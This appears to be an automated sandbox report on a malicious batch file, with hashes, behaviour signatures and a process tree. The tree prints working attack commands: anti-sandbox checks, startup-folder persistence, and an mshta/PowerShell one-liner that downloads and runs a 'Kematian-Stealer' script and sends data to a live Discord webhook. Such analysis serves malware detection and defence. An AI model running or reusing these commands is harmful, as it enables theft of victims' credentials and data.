Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system -
submitted
05/07/2024, 01:01
Static task
static1
Behavioral task
behavioral1
Sample
84617e9c081b6b585582d2589aace5a0a7887283f9488b5a6d05906f94116f36.bat
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
84617e9c081b6b585582d2589aace5a0a7887283f9488b5a6d05906f94116f36.bat
Resource
win10v2004-20240704-en
General
-
Target
84617e9c081b6b585582d2589aace5a0a7887283f9488b5a6d05906f94116f36.bat
-
Size
3.4MB
-
MD5
07f9549ba0e65bb2bd47fcf55c60a608
-
SHA1
50f97f17245b1967ae322f5a72f48184db4932fa
-
SHA256
84617e9c081b6b585582d2589aace5a0a7887283f9488b5a6d05906f94116f36
-
SHA512
d9c2e350d2e963b64c6da7519cdbf15a56a61131098d608721d2e0773e6632b4cb89b90165b212b83b271b5f136539dfe3586dbeef8db6bedc0d358b8d02cd41
-
SSDEEP
1536:r9M37hEimNW4QbAjC5SMd0aF00kd5Regk1IcIoJkFVcKaoowmgd27/:IENXCbiae0kjRep6VcEo/gUT
Malware Config
Signatures
-
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fr.bat cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fr.bat cmd.exe -
Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid Process 2148 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2148 powershell.exe 2568 powershell.exe 1956 powershell.exe 308 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2148 powershell.exe Token: SeDebugPrivilege 2568 powershell.exe Token: SeDebugPrivilege 1956 powershell.exe Token: SeDebugPrivilege 308 powershell.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 328 wrote to memory of 1320 328 cmd.exe 29 PID 328 wrote to memory of 1320 328 cmd.exe 29 PID 328 wrote to memory of 1320 328 cmd.exe 29 PID 328 wrote to memory of 2148 328 cmd.exe 30 PID 328 wrote to memory of 2148 328 cmd.exe 30 PID 328 wrote to memory of 2148 328 cmd.exe 30 PID 328 wrote to memory of 2728 328 cmd.exe 31 PID 328 wrote to memory of 2728 328 cmd.exe 31 PID 328 wrote to memory of 2728 328 cmd.exe 31 PID 328 wrote to memory of 2628 328 cmd.exe 32 PID 328 wrote to memory of 2628 328 cmd.exe 32 PID 328 wrote to memory of 2628 328 cmd.exe 32 PID 328 wrote to memory of 2544 328 cmd.exe 33 PID 328 wrote to memory of 2544 328 cmd.exe 33 PID 328 wrote to memory of 2544 328 cmd.exe 33 PID 328 wrote to memory of 2528 328 cmd.exe 34 PID 328 wrote to memory of 2528 328 cmd.exe 34 PID 328 wrote to memory of 2528 328 cmd.exe 34 PID 328 wrote to memory of 2568 328 cmd.exe 35 PID 328 wrote to memory of 2568 328 cmd.exe 35 PID 328 wrote to memory of 2568 328 cmd.exe 35 PID 328 wrote to memory of 1956 328 cmd.exe 36 PID 328 wrote to memory of 1956 328 cmd.exe 36 PID 328 wrote to memory of 1956 328 cmd.exe 36 PID 328 wrote to memory of 2856 328 cmd.exe 37 PID 328 wrote to memory of 2856 328 cmd.exe 37 PID 328 wrote to memory of 2856 328 cmd.exe 37 PID 328 wrote to memory of 2936 328 cmd.exe 38 PID 328 wrote to memory of 2936 328 cmd.exe 38 PID 328 wrote to memory of 2936 328 cmd.exe 38 PID 2936 wrote to memory of 2980 2936 net.exe 39 PID 2936 wrote to memory of 2980 2936 net.exe 39 PID 2936 wrote to memory of 2980 2936 net.exe 39 PID 328 wrote to memory of 760 328 cmd.exe 40 PID 328 wrote to memory of 760 328 cmd.exe 40 PID 328 wrote to memory of 760 328 cmd.exe 40 PID 760 wrote to memory of 308 760 mshta.exe 41 PID 760 wrote to memory of 308 760 mshta.exe 41 PID 760 wrote to memory of 308 760 mshta.exe 41
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\84617e9c081b6b585582d2589aace5a0a7887283f9488b5a6d05906f94116f36.bat"1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:328 -
C:\Windows\system32\findstr.exefindstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\84617e9c081b6b585582d2589aace5a0a7887283f9488b5a6d05906f94116f36.bat"2⤵PID:1320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"2⤵
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2148
-
-
C:\Windows\system32\findstr.exefindstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\84617e9c081b6b585582d2589aace5a0a7887283f9488b5a6d05906f94116f36.bat"2⤵PID:2728
-
-
C:\Windows\system32\findstr.exefindstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\84617e9c081b6b585582d2589aace5a0a7887283f9488b5a6d05906f94116f36.bat"2⤵PID:2628
-
-
C:\Windows\system32\chcp.comchcp 650012⤵PID:2544
-
-
C:\Windows\system32\findstr.exefindstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\84617e9c081b6b585582d2589aace5a0a7887283f9488b5a6d05906f94116f36.bat"2⤵PID:2528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -c "Write-Host -NoNewLine $null"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -c "Write-Host -NoNewLine $null"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1956
-
-
C:\Windows\system32\rundll32.exerundll322⤵PID:2856
-
-
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:2980
-
-
-
C:\Windows\system32\mshta.exemshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0))2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:308
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
231B
MD51fdf1ddeddb7b144e8f93262144a56d1
SHA1cfcd1c4ebcf5e83a583ac8688aa5062abf57c8d1
SHA256c71e50112a771b021417874d43158b7f2edb7c6f17102898c9015cef675e8917
SHA51291ab8c53c36af4f34db66a4f26261e2dd92d9b2519291380f9a07aaa00a820788342314ea623dfae2c1dd55627c89e732a366a85086326ca3b04893cb4f626d5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5b4bdfec1daf86cf76948034b7b15c517
SHA1fc0160fb6ea409a3e1a3024be85aabe703c2f664
SHA256143e49d8e51427180878a8713bd6849b1b52d882b36c7e34e9cf255adf092b75
SHA5124c3deb6817df02ce532518314812745521f6890db54a0c559add8e05fd54022dd8a7692683371d4ac613999b6975bab0781781dccdc4975fc1f4bd45f53397da